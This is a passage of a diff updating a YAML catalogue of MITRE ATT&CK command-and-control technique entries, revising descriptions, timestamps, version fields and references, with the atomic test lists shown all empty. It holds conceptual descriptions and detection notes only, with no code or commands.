+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1573.001:
     technique:
       modified: '2023-12-26T20:58:19.356Z'
@@ -36836,7 +37317,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1568.001:
     technique:
@@ -36868,7 +37348,7 @@ command-and-control:
         url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
         description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
           are they and how do they work?. Retrieved March 11, 2020.'
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T16:10:37.183Z'
       name: Fast Flux DNS
       description: |-
         Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
@@ -36890,22 +37370,20 @@ command-and-control:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071:
     technique:
-      modified: '2024-01-17T22:52:23.454Z'
+      modified: '2024-08-28T14:10:33.145Z'
       name: Application Layer Protocol
       description: "Adversaries may communicate using OSI application layer protocols
         to avoid detection/network filtering by blending in with existing traffic.
         Commands to the remote system, and often the results of those commands, will
         be embedded within the protocol traffic between the client and server. \n\nAdversaries
         may utilize many different protocols, including those used for web browsing,
-        transferring files, electronic mail, or DNS. For connections that occur internally
-        within an enclave (such as those between a proxy or pivot node and other nodes),
-        commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
-        Spy Email Nov 22) "
+        transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+        that occur internally within an enclave (such as those between a proxy or
+        pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+        Mandiant APT29 Eye Spy Email Nov 22) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -36927,7 +37405,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -36952,7 +37430,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071
     atomic_tests: []
   T1219:
@@ -37036,7 +37513,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1219
     atomic_tests: []
   T1659:
@@ -37100,11 +37576,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -37188,7 +37663,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1572:
     technique:
@@ -37219,7 +37693,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T17:15:35.372Z'
       name: Protocol Tunneling
       description: "Adversaries may tunnel network communications to and from a victim
         system within a separate protocol to avoid detection/network filtering and/or
@@ -37239,8 +37713,8 @@ command-and-control:
         encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
         JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
         in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
-        [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
-        further conceal C2 communications and infrastructure. "
+        [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+        to further conceal C2 communications and infrastructure. "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -37262,8 +37736,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1572
     atomic_tests: []
   T1071.003:
@@ -37325,7 +37797,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1092:
     technique:
@@ -37373,7 +37844,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090.002:
     technique:
@@ -37427,7 +37897,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090:
     technique:
@@ -37460,7 +37929,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T19:16:11.648Z'
       name: Proxy
       description: |-
         Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
@@ -37480,8 +37949,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1568:
     technique:
@@ -37519,7 +37986,7 @@ command-and-control:
         url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:26:23.782Z'
       name: Dynamic Resolution
       description: |-
         Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -37547,42 +38014,22 @@ command-and-control:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1102:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Anastasios Pingios
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
-      type: attack-pattern
-      created: '2017-05-31T21:31:13.915Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1102
-        url: https://attack.mitre.org/techniques/T1102
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-07T17:53:54.380Z'
       name: Web Service
       description: |-
-        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
 
         Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - Anastasios Pingios
+      - Sarathkumar Rajendran, Microsoft Defender365
+      x_mitre_deprecated: false
       x_mitre_detection: 'Host data that can relate unknown or suspicious process
         activity using a network connection is important to supplement any existing
         indicators of compromise based on malware command and control signatures and
@@ -37591,17 +38038,39 @@ command-and-control:
         for uncommon data flows (e.g., a client sending significantly more data than
         it receives from a server). User behavior monitoring may help to detect abnormal
         patterns of activity.(Citation: University of Birmingham C2)'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+      created: '2017-05-31T21:31:13.915Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1102
+        external_id: T1102
+      - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+        description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+          Graph API for C&C communication. Retrieved July 1, 2024.
+        url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1568.003:
     technique:
@@ -37633,7 +38102,7 @@ command-and-control:
         description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
           Operations. Retrieved March 6, 2017.
         url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T20:54:28.287Z'
       name: DNS Calculation
       description: |-
         Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
@@ -37650,8 +38119,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1104:
     technique:
@@ -37671,7 +38138,7 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1104
         external_id: T1104
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:43:38.181Z'
       name: Multi-Stage Channels
       description: |-
         Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -37694,8 +38161,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1205.001:
     technique:
@@ -37720,7 +38185,7 @@ command-and-control:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -37745,8 +38210,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.002:
     technique:
@@ -37811,7 +38274,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1102.003:
     technique:
@@ -37835,7 +38297,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:26:10.109Z'
       name: One-Way Communication
       description: |-
         Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -37860,21 +38322,36 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.003:
     technique:
-      modified: '2024-04-19T13:24:36.872Z'
+      modified: '2024-09-25T20:48:24.411Z'
       name: 'Proxy: Multi-hop Proxy'
-      description: |-
-        Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
-        For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
-        In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN).  Protocols such as ICMP may be used as a transport.
-
-        Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+      description: "Adversaries may chain together multiple proxies to disguise the
+        source of malicious traffic. Typically, a defender will be able to identify
+        the last proxy traffic traversed before it enters their network; the defender
+        may or may not be able to identify any previous proxies before the last-hop
+        proxy. This technique makes identifying the original source of the malicious
+        traffic even more difficult by requiring the defender to trace malicious traffic
+        through several proxies to identify its source.\n\nFor example, adversaries
+        may construct or use onion routing networks – such as the publicly available
+        [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+        C2 traffic through a compromised population, allowing communication with any
+        device within the network.(Citation: Onion Routing) Adversaries may also use
+        operational relay box (ORB) networks composed of virtual private servers (VPS),
+        Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+        obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+        infrastructure, it is possible for an adversary to leverage multiple compromised
+        devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+        By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+        on routers, adversaries can add custom code to the affected network devices
+        that will implement onion routing between those nodes. This method is dependent
+        upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+        method allowing the adversaries to cross the protected network boundary of
+        the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+        \ Protocols such as ICMP may be used as a transport.  \n\nSimilarly, adversaries
+        may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+        routing between a decentralized network of peers.(Citation: NGLite Trojan)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -37893,7 +38370,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.1'
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -37907,6 +38384,11 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1090/003
         external_id: T1090.003
+      - source_name: ORB Mandiant
+        description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+          Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+          July 8, 2024.
+        url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
       - source_name: NGLite Trojan
         description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
           7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
@@ -37920,12 +38402,11 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.003
     atomic_tests: []
   T1001:
     technique:
-      modified: '2024-02-02T19:04:35.389Z'
+      modified: '2024-10-07T15:07:47.232Z'
       name: Data Obfuscation
       description: 'Adversaries may obfuscate command and control traffic to make
         it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -37975,11 +38456,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1571:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:37:57.868Z'
       name: Non-Standard Port
       description: |-
         Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -37988,20 +38468,20 @@ command-and-control:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze packet contents to detect communications that do
         not follow the expected protocol behavior for the port that is being used.
         Analyze network data for uncommon data flows (e.g., a client sending significantly
         more data than it receives from a server). Processes utilizing the network
         that do not normally have network communication or have never been seen before
         are suspicious.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
@@ -38026,17 +38506,16 @@ command-and-control:
         url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       - source_name: Fortinet Agent Tesla April 2018
         description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
           Variant. Retrieved November 5, 2018.
         url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1571
     atomic_tests: []
   T1573:
@@ -38092,7 +38571,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1573
     atomic_tests: []
   T1102.002:
@@ -38117,7 +38595,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:15:47.861Z'
       name: Bidirectional Communication
       description: "Adversaries may use an existing, legitimate external Web service
         as a means for sending commands to and receiving output from a compromised
@@ -38154,8 +38632,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1573.002:
     technique:
@@ -38209,7 +38685,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1095:
     technique:
@@ -38281,33 +38756,12 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1095
     atomic_tests: []
   T1001.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
-      type: attack-pattern
-      created: '2020-03-15T00:40:27.503Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1001.003
-        url: https://attack.mitre.org/techniques/T1001/003
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
-      name: Protocol Impersonation
+      modified: '2024-10-09T15:40:19.436Z'
+      name: Protocol or Service Impersonation
       description: "Adversaries may impersonate legitimate protocols or web service
         traffic to disguise command and control activity and thwart analysis efforts.
         By impersonating legitimate protocols or web services, adversaries can make
@@ -38315,23 +38769,61 @@ command-and-control:
         \ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
         like subsequent traffic is SSL/TLS encrypted, potentially interfering with
         some security tooling, or to make the traffic look like it is related with
-        a trusted entity. "
+        a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+        impersonate expected web traffic or trusted services. For example, adversaries
+        may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+        data to disguise C2 communications or mimic legitimate services such as Gmail,
+        Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
+        Malleable-C2-U42)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - James Emery-Callcott, Emerging Threats Team, Proofpoint
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
         sending significantly more data than it receives from a server). Processes
         utilizing the network that do not normally have network communication or have
         never been seen before are suspicious. Analyze packet contents to detect communications
         that do not follow the expected protocol behavior for the port that is being
         used.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+      created: '2020-03-15T00:40:27.503Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1001/003
+        external_id: T1001.003
+      - source_name: Malleable-C2-U42
+        description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+          Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+          How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+          September 24, 2024.'
+        url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      - source_name: ESET Okrum July 2019
+        description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+          RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1090.004:
     technique:
@@ -38378,7 +38870,6 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1132:
     technique:
@@ -38438,7 +38929,6 @@ command-and-control:
